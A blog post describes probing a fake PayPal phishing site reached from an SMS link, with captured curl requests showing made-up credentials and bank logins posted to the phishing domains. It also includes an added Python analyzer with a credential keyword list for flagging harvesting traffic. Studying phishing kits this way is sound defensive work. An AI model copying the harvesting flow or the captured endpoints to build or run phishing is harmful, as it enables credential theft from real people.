We all get these phishing emails that look real, about an account or a transaction, and ask you to log in to your account for some reason.

A friend posted a warning about a phishing attempt he received as an SMS with a link to a fake PayPal site. The message claims that his account was suspended and that he needs to log in to verify and restore the account.

I've always ignored these phishing messages and fake sites. The most I would do is report it if it came in an email. This time I decided to follow the link and see what they had built: what information they are after, and how real the fake site would look.

I first spun up my VPN (I use NordVPN) and connected to a Brazilian server.

Then I opened the website in incognito mode (you can never be too careful with these sites). I should have opened it from a virtual machine.

A good thing was that I got the Google Chrome warning about the deceptive site!

I continued :) and that's where I noticed that these hackers/scammers are not your average dumb hackers. They have actually gone above and beyond to

  • make this look real
  • collect as much info as possible
  • protect against scam baiters

To start with, they actually have CAPTCHAs when you first enter the site. LOL

Then they take you to a somewhat realistic-looking PayPal login page. And that's where I opened up my good old developer tools.

I made up an email address and used it in the forms. They have validation on email addresses, and not only client-side, running in your browser: they actually have remote (server-side) email validation!! (I hope they are not using my code to do that.) Not to mention that all the POST requests are also validated with session and cookies.

curl 'https://mypaypalcheck.com/authflow/emailauth/emailvalidate.php?emaildress=jon297_1992@gmail.com&_=1587xxxxx' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36' \
  -H 'DNT: 1' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Referer: https://mypaypalcheck.com/authflow/challengesBank?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxxx' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  -H 'Cookie: PHPSESSID=52760xxxxxxxxxxxxxx' \
  --compressed

So, I entered my password (a very strong password!).

And I noticed that on the first attempt they do not collect the password; no requests are sent. Rather, they show you a message that the password is incorrect. This is somewhat clever, to make sure that you enter your actual password.

And now data collection begins!!

Username/Password

They make a POST request to get the username and password. Again, with session and cookie validation:

curl 'https://mypaypalcheck.com/authflow/data/paypal/loginpaypal?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxxxxxxx' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'Origin: https://mypaypalcheck.com' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'DNT: 1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Referer: https://mypaypalcheck.com/authflow/signin?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxx' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  -H 'Cookie: PHPSESSID=52xxxxxxxxxxx' \
  --data 'EML=jon297_1992%40gmail.com&PWD=password1_1pass' \
  --compressed

Bank Account

Then they follow with the bank account info. Here, things get a little more interesting, and it seems like they may be reusing different components of their system for different scams.

This part seems to be loaded from a different server, and looks like a module that could also be used to fake connecting payment info (as when you pay for a service online).

The content is loaded from https://16shop-authen.cleverapps.io/paypal/, and looking at that main domain, it seems like a legitimate business that offers Platform as a Service (PaaS). But who knows, it could be malicious too!

They even do CORS checks and all. SMH!

curl 'https://16shop-authen.cleverapps.io/paypal/' \
  -H 'Connection: keep-alive' \
  -H 'Pragma: no-cache' \
  -H 'Cache-Control: no-cache' \
  -H 'Accept: */*' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36' \
  -H 'DNT: 1' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: https://mypaypalcheck.com' \
  -H 'Sec-Fetch-Site: cross-site' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Referer: https://mypaypalcheck.com/authflow/challengesBank?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxx' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  --data 'userbank=jon297_1992&passwordbank=password1_1pass&loginretry=1&PaypalBank=Chase' \
  --compressed
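The three captured requests (the server-side email check, the credential POST, and the cross-site POST to the second backend) are exactly what a responder would pull out of a proxy log or HAR file. The following analyzer is an added example written for this write-up, not code from the original post or from the phishing kit. It rebuilds those three requests from the curl commands above (same redacted values), then applies three checks: credential-looking parameter names in the query string or form body, submissions whose Origin/Referer host differs from the destination host, and a PHPSESSID cookie binding the flow to a server-side session. The parameter names `pin`, `ssn`, `card` and `cvv` are assumptions for the later form steps the post describes but does not capture.

```python
"""Flag credential-harvesting behaviour in captured HTTP requests.

Added example, not code from the phishing kit or the original post.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Parameter names that carry credentials or identity data. EML, PWD,
# emaildress, userbank and passwordbank come from the captured requests;
# pin, ssn, card and cvv are assumed names for the later form steps.
CREDENTIAL_KEYS = {"eml", "pwd", "emaildress", "email", "password",
                   "userbank", "passwordbank", "pin", "ssn", "card", "cvv"}


@dataclass
class Request:
    method: str
    url: str
    headers: Dict[str, str]
    body: str = ""


@dataclass
class Finding:
    url: str
    credential_params: List[str] = field(default_factory=list)
    cross_site_from: Optional[str] = None   # source host if it differs from destination
    session_cookie: Optional[str] = None    # PHPSESSID value, if present

    @property
    def suspicious(self) -> bool:
        return bool(self.credential_params) or self.cross_site_from is not None


def _host(url: str) -> str:
    return urlsplit(url).hostname or ""


def _params(req: Request) -> Dict[str, str]:
    """Merge query-string and form-body parameters into one dict.

    parse_qsl splits each pair on the first '=', so the kit's odd
    'key=sslchannel=true' becomes ('key', 'sslchannel=true') unharmed.
    """
    pairs = parse_qsl(urlsplit(req.url).query, keep_blank_values=True)
    ctype = req.headers.get("Content-Type", "")
    if req.body and ctype.startswith("application/x-www-form-urlencoded"):
        pairs += parse_qsl(req.body, keep_blank_values=True)
    return dict(pairs)


def analyse(req: Request) -> Finding:
    """Run the three checks over one request and return what was found."""
    finding = Finding(url=req.url)
    for name in _params(req):
        if name.lower() in CREDENTIAL_KEYS:
            finding.credential_params.append(name)
    # Cross-site submission: the page that sent the data lives on a different
    # host than the endpoint receiving it (Origin first, Referer as fallback).
    src = req.headers.get("Origin") or req.headers.get("Referer") or ""
    if src and _host(src) != _host(req.url):
        finding.cross_site_from = _host(src)
    for part in req.headers.get("Cookie", "").split(";"):
        key, _, value = part.strip().partition("=")
        if key == "PHPSESSID":
            finding.session_cookie = value
    return finding


# Constructed from the three curl commands captured above, same redactions.
CAPTURED = [
    Request("GET",
            "https://mypaypalcheck.com/authflow/emailauth/emailvalidate.php?emaildress=jon297_1992@gmail.com&_=1587xxxxx",
            {"X-Requested-With": "XMLHttpRequest",
             "Referer": "https://mypaypalcheck.com/authflow/challengesBank?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxxx",
             "Cookie": "PHPSESSID=52760xxxxxxxxxxxxxx"}),
    Request("POST",
            "https://mypaypalcheck.com/authflow/data/paypal/loginpaypal?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxxxxxxx",
            {"Origin": "https://mypaypalcheck.com",
             "Content-Type": "application/x-www-form-urlencoded",
             "Cookie": "PHPSESSID=52xxxxxxxxxxx"},
            "EML=jon297_1992%40gmail.com&PWD=password1_1pass"),
    Request("POST",
            "https://16shop-authen.cleverapps.io/paypal/",
            {"Origin": "https://mypaypalcheck.com",
             "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
             "Referer": "https://mypaypalcheck.com/authflow/challengesBank?key=sslchannel=true&sessionid=&country.x=BR&clientInstanceId=89xxxxxxxxxx"},
            "userbank=jon297_1992&passwordbank=password1_1pass&loginretry=1&PaypalBank=Chase"),
]


def report(requests: List[Request] = CAPTURED) -> List[Finding]:
    return [analyse(r) for r in requests]


if __name__ == "__main__":
    for f in report():
        print(f"{_host(f.url):32} creds={f.credential_params} "
              f"cross_site_from={f.cross_site_from} session={f.session_cookie}")
```

Run against the three captures, every request is flagged: the email check leaks the address in a GET query string, the login POST carries EML/PWD under a PHPSESSID session, and the bank step is the only one whose Origin host (mypaypalcheck.com) does not match the destination host, which is the signal that a second backend is collecting the data.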

Personal Info

Then they move on to collecting all personal info: name, address, SSN, phone, phone PIN, etc.

What's funny here is that not only are they doing basic client-side validation, they are also very helpful and want to save you time. They call an API to auto-populate the City from the ZIP code you enter.

I headed over to www.fakepersongenerator.com to get some fake info :)

And filled them in.

Debit Card

And here they validate too, and load some pretty logos for you so you don't get confused about which type of debit card you have...

The End

Finally, after they collect all this info, they redirect you to the real PayPal site :(